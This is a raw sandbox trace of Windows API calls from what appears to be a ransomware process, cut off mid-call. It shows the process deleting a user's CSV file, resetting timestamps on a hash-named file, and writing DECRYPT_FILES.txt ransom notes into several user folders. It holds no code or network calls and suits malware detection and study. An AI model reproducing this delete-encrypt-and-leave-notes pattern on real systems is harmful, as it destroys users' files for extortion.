GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv", lpFilePart=0x0) returned 0x43 [0076.878] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\yno -au8wolrif.csv")) returned 1 [0076.878] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv", lpFilePart=0x0) returned 0x43 [0076.879] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\7AD2170DA0A9AA4CF2545F926E74DE40", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\7AD2170DA0A9AA4CF2545F926E74DE40", lpFilePart=0x0) returned 0x51 [0076.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.879] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\7AD2170DA0A9AA4CF2545F926E74DE40" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\7ad2170da0a9aa4cf2545f926e74de40"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.879] GetFileType (hFile=0x36c) returned 0x1 [0076.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.879] GetFileType (hFile=0x36c) returned 0x1 [0076.879] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d318, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.879] CloseHandle (hObject=0x36c) returned 1 [0076.879] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\7AD2170DA0A9AA4CF2545F926E74DE40", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\7AD2170DA0A9AA4CF2545F926E74DE40", lpFilePart=0x0) returned 0x51 [0076.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.879] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\7AD2170DA0A9AA4CF2545F926E74DE40" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\7ad2170da0a9aa4cf2545f926e74de40"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.879] GetFileType (hFile=0x36c) returned 0x1 [0076.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.879] GetFileType (hFile=0x36c) returned 0x1 [0076.879] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d318, lpLastWriteTime=0x0) returned 1 [0076.880] CloseHandle (hObject=0x36c) returned 1 [0076.880] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\7AD2170DA0A9AA4CF2545F926E74DE40", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\7AD2170DA0A9AA4CF2545F926E74DE40", lpFilePart=0x0) returned 0x51 [0076.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.880] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\7AD2170DA0A9AA4CF2545F926E74DE40" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\7ad2170da0a9aa4cf2545f926e74de40"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.880] GetFileType (hFile=0x36c) returned 0x1 [0076.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.880] GetFileType (hFile=0x36c) returned 0x1 [0076.880] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d318) returned 1 [0076.880] CloseHandle (hObject=0x36c) returned 1 [0076.880] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1bf5cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x42 [0076.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d1f0) returned 1 [0076.880] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\DECRYPT_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x36c [0076.881] GetFileType (hFile=0x36c) returned 0x1 [0076.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d160) returned 1 [0076.881] GetFileType (hFile=0x36c) returned 0x1 [0076.882] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1bf5d610, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x39 [0076.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5daf0) returned 1 [0076.883] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DECRYPT_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x36c [0076.883] GetFileType (hFile=0x36c) returned 0x1 [0076.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da60) returned 1 [0076.883] GetFileType (hFile=0x36c) returned 0x1 [0076.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5db80) returned 1 [0076.884] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads", nBufferLength=0x105, lpBuffer=0x1bf5d670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads", lpFilePart=0x0) returned 0x27 [0076.884] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", nBufferLength=0x105, lpBuffer=0x1bf5d610, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpFilePart=0x0) returned 0x28 [0076.884] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x1bf5d820 | out: lpFindFileData=0x1bf5d820*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de2d0 [0076.884] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.885] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.885] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0076.885] FindClose (in: hFindFile=0x1a5de2d0 | out: hFindFile=0x1a5de2d0) returned 1 [0076.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5dad0) returned 1 [0076.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da90) returned 1 [0076.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5db80) returned 1 [0076.885] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads", nBufferLength=0x105, lpBuffer=0x1bf5d670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads", lpFilePart=0x0) returned 0x27 [0076.885] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", nBufferLength=0x105, lpBuffer=0x1bf5d610, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpFilePart=0x0) returned 0x28 [0076.885] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x1bf5d820 | out: lpFindFileData=0x1bf5d820*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de2d0 [0076.885] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.886] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.886] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0076.886] FindClose (in: hFindFile=0x1a5de2d0 | out: hFindFile=0x1a5de2d0) returned 1 [0076.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5dad0) returned 1 [0076.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da90) returned 1 [0076.886] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1bf5d610, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x39 [0076.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5daf0) returned 1 [0076.886] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\DECRYPT_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x36c [0076.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da60) returned 1 [0076.891] WriteFile (in: hFile=0x36c, lpBuffer=0x230b940*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1bf5db38, lpOverlapped=0x0 | out: lpBuffer=0x230b940*, lpNumberOfBytesWritten=0x1bf5db38*=0x9d5, lpOverlapped=0x0) returned 1 [0076.892] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1bf5df10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x2f [0076.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5e3f0) returned 1 [0076.892] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DECRYPT_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x36c [0076.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5e360) returned 1 [0076.892] WriteFile (in: hFile=0x36c, lpBuffer=0x230e010*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1bf5e438, lpOverlapped=0x0 | out: lpBuffer=0x230e010*, lpNumberOfBytesWritten=0x1bf5e438*=0x9d5, lpOverlapped=0x0) returned 1 [0076.893] GetFullPathNameW (in: lpFileName="C:\\Users\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1bf5e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1a [0076.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5ecf0) returned 1 [0076.893] CreateFileW (lpFileName="C:\\Users\\DECRYPT_FILES.txt" (normalized: "c:\\users\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x36c [0076.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5ec60) returned 1 [0076.894] WriteFile (in: hFile=0x36c, lpBuffer=0x2310690*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1bf5ed38, lpOverlapped=0x0 | out: lpBuffer=0x2310690*, lpNumberOfBytesWritten=0x1bf5ed38*=0x9d5, lpOverlapped=0x0) returned 1 [0076.955] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.978] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.983] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.987] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.992] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.008] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.012] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.021] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.028] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.035] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.090] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.103] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.108] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.112] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.116] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.119] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.123] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.126] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.130] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.134] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.136] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.139] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.143] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.147] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.149] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.152] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.158] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.161] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.167] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.171] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.175] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.178] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.182] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.189] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.218] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.223] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.227] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.232] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.234] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.239] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.243] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.247] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.251] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.257] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.261] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.264] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.267] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.271] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.274] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.281] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 Thread: id = 115 os_tid = 0x8b8 Thread: id = 116 os_tid = 0x8c0 [0053.982] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0053.983] CoGetContextToken (in: pToken=0x1c0ef350 | out: pToken=0x1c0ef350) returned 0x0 [0053.983] CObjectContext::QueryInterface () returned 0x0 [0053.983] CObjectContext::GetCurrentThreadType () returned 0x0 [0053.983] Release () returned 0x0 [0053.983] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0053.983] CoUninitialize () [0054.047] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0054.047] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR", lpFilePart=0x0) returned 0xd [0054.047] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR\\", lpFilePart=0x0) returned 0xe [0054.047] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.129] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.130] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0054.130] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0054.130] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee600) returned 1 [0054.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5c0) returned 1 [0054.130] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0054.130] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR", lpFilePart=0x0) returned 0xd [0054.130] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR\\", lpFilePart=0x0) returned 0xe [0054.130] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.130] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.130] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0054.131] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0054.131] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.131] SetThreadErrorMode 